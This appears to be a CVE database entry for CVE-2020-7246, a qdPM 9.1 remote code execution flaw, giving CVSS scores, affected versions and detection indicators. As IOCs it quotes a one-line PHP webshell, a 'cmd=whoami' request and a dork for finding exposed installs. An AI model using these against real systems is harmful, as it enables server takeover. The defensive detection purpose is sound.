cbcvebase.
CVE-2020-7246
published 2020-01-21

CVE-2020-7246: A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo…

PriorityP277high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
83.23%
99.6th percentile
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

Affected

1 ranges
VendorProductVersion rangeFixed in
qdpmqdpm<= 9.1

Detection & IOCsextracted from sources · hover to see the quote

path/uploads/users/
pathindex.php/myAccount/update
pathindex.php/myAccount
filenamebackdoor.php
filename.htaccess
command?cmd=whoami
command$cmd = ($_REQUEST['cmd']); system($cmd);
  • Detect path traversal in the users[photo_preview] POST parameter — values containing '../' sequences targeting .htaccess deletion are a strong indicator of CVE-2020-7246 exploitation.
  • Monitor POST requests to 'index.php/myAccount/update' that include a multipart file upload with a PHP file (Content-Type: application/octet-stream) as the users[photo] field.
  • Detect PHP webshell execution attempts via GET requests to '/uploads/users/*.php?cmd=' — this path is where the malicious file lands after upload.
  • Use the Google Dork pattern as a hunting query to identify exposed qdPM 9.1 instances: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
  • Uploaded PHP files in /uploads/users/ are renamed with a numeric prefix (e.g., 1584009-webshell.php). Alert on any .php file appearing under this directory.
  • ·Exploitation requires valid credentials for at least one non-admin user account. The designated admin account cannot be used because it lacks a myAccount page.
  • ·This CVE is an incomplete fix for CVE-2015-3884; installations that applied the prior patch may still be vulnerable if running qdPM 9.1 or earlier.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.